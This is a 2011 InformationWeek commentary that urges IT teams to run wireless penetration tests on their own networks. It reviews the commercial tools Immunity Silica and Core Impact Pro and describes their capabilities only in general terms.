Mobile
Commentary
8/29/2011
02:46 PM
Kurt Marko
Kurt Marko
Commentary
Connect Directly
LinkedIn
Twitter
Facebook
RSS
E-Mail
50%
50%

Wireless Penetration Testing: Not Just For Hackers

Do Def Con and Black Hat turn you into an IT hypochondriac? Then inoculate your WLAN.

Midsummer in Las Vegas is to geeks, hackers, and IT security pros what mid-April in Augusta is to golf fanatics: an opportunity to watch the best in their respective fields strut their stuff. One could aptly term the twin Vegas conferences, the "official" legitimized Black Hat and no-holds-barred Def Con, the "Masters" of the computer security world. Packed with presentations on innovative exploits, demonstrations of new security software, and competitive hacker challenges, these conferences are invaluable sources of information for security-minded amateurs and professionals alike.

Unfortunately for the rest of IT, they represent an annual horror show demonstrating just how pathetic your security defenses actually are.

You don't even have to be there, either. Just browsing the agenda, reading presentations, and following the stream of news releases is enough to turn anyone into a paranoid, tin-foil-hat-wearing basket case, seeing security doomsday in every email attachment, Web link, or computer glitch. While that's a natural reaction, it's not very productive. Better to use the events as an occasion for annual personal and organizational examination and as motivation to make a new year's worth of security resolutions.

One area where IT can never be too mindful, defensive, and proactive is in wireless security, particularly now that wireless LANs have become the lifeblood of mobile devices and their apps. Enter wireless penetration testing. Pen testing is one of those seamy activities, like undercover police work, that feels dirty but necessary. You imagine yourself as Marshal Dillon, but you're more like Frank Serpico.

In case you haven't noticed, the tools for wireless penetration testing have turned into something of a cottage industry. There are now full-blown suites that do everything from automatically impersonate access points and initiate man-in-the-middle (MITM) attacks to sniff and decrypt private network (WEP and WPA) traffic. While the development and innovation in wireless hacking -- tools like Kismet, Karmetasploit, and Aircrack-ng -- comes from the open source hacker community, finding the correct tools and piecing them together into a coherent penetration test regime gets complicated (witness this handy flow chart). Here's where commercial software comes in, exemplified by two interesting new products.

The first, Silica from Immunity, is a veritable Swiss army knife of wireless hacking. Like most of the best security software collections, such as the incomparable BackTrack, Silica runs on Linux; however, it's distributed as a bootable USB drive (for native operation) and virtual machine image (i.e. virtual appliance), making it easy to run on any Intel laptop. What makes Silica interesting and particularly useful (or dangerous, depending on your perspective) is that it combines the features of network and client exploitation tools. Namely, once Silica has compromised a network (by, say, cracking the key) or wireless client (via MITM), it can unleash a host of client penetration exploits, much like Metasploit. For example, most Windows clients cache WEP and WPA2 keys for secured networks they have previously authenticated with (so-called PMK caching). If Silica successfully penetrates said client, it can pull all the cached keys (in plain text), allowing unfettered access to a new set of WLANs.

Of course, Silica also does packet capture and analysis a la Wireshark, so once you're on an encrypted network, you view all of the client traffic. In sum, if you want to see both how susceptible your WLANs are to every known attack (Silica comes with an update subscription) and how vulnerable wireless clients are to network exploits, Silica is your tool. Here's a nice video demo illustrating the features and interface, courtesy of Hak5.

The second, Core Impact Pro from Core Security, is perhaps the first to specifically address mobile device (Android, BlackBerry, and iOS) vulnerabilities. Like Silica, Core Impact offers a full set of pen-testing features, including Wi-Fi network reconnaissance, encrypted network cracking, MITM client attacks, SSID impersonation, automated traffic sniffing and packet analysis, and integration with Core's wired and application-testing modules to emulate a multistage assault in which an attacker uses the WLAN as a jumping-off point to get at back-end databases and Web servers. Just added is the ability to target mobile clients with exploits specially crafted for mobile operating systems and usage patterns. For example, Core Impact can send phishing emails and SMS messages, or intercept, redirect, and impersonate Web traffic, in an effort to get users to install a malicious mobile app or divulge personal information. Once a device is compromised, the software can extract phone and SMS logs and GPS location data and contact information, and even activate the device's camera.

Like any tool, penetration testers can be used with the best (white hat) or worst (black hat) of intentions, and the fact that these things exist at all should be a frightening prospect to anyone charged with network security. But the bottom line is, you can't plug holes you don't know about, and if your org is a high-value target, like any firm handling financial, personal, or sensitive information, you can bet there's someone trying to find cracks in your defenses. Although the latest commercial tools sport point-and-click GUIs, they don't replace a solid understanding of network protocols and client exploitation techniques, meaning they're best left in the hands of a security expert. If you don't have a black-belt security master on your staff, find a consultant who knows how to drive these, or similar tools, to assess the strength of your WLAN defenses.

For all their value as premier sources of information, the summer ritual of Vegas hack-a-thons can also serve as a call for renewed security vigilance -- in this case, by seeing your wireless network through the eyes of an attacker.

Comment  | 
Print  | 
More Insights
InformationWeek Elite 100
InformationWeek Elite 100
Our data shows these innovators using digital technology in two key areas: providing better products and cutting costs. Almost half of them expect to introduce a new IT-led product this year, and 46% are using technology to make business processes more efficient.
Register for InformationWeek Newsletters
White Papers
Current Issue
InformationWeek Tech Digest September 18, 2014
Enterprise social network success starts and ends with integration. Here's how to finally make collaboration click.
Flash Poll
Video
Slideshows
Twitter Feed
InformationWeek Radio
Archived InformationWeek Radio
The weekly wrap-up of the top stories from InformationWeek.com this week.
Sponsored Live Streaming Video
Everything You've Been Told About Mobility Is Wrong
Attend this video symposium with Sean Wisdom, Global Director of Mobility Solutions, and learn about how you can harness powerful new products to mobilize your business potential.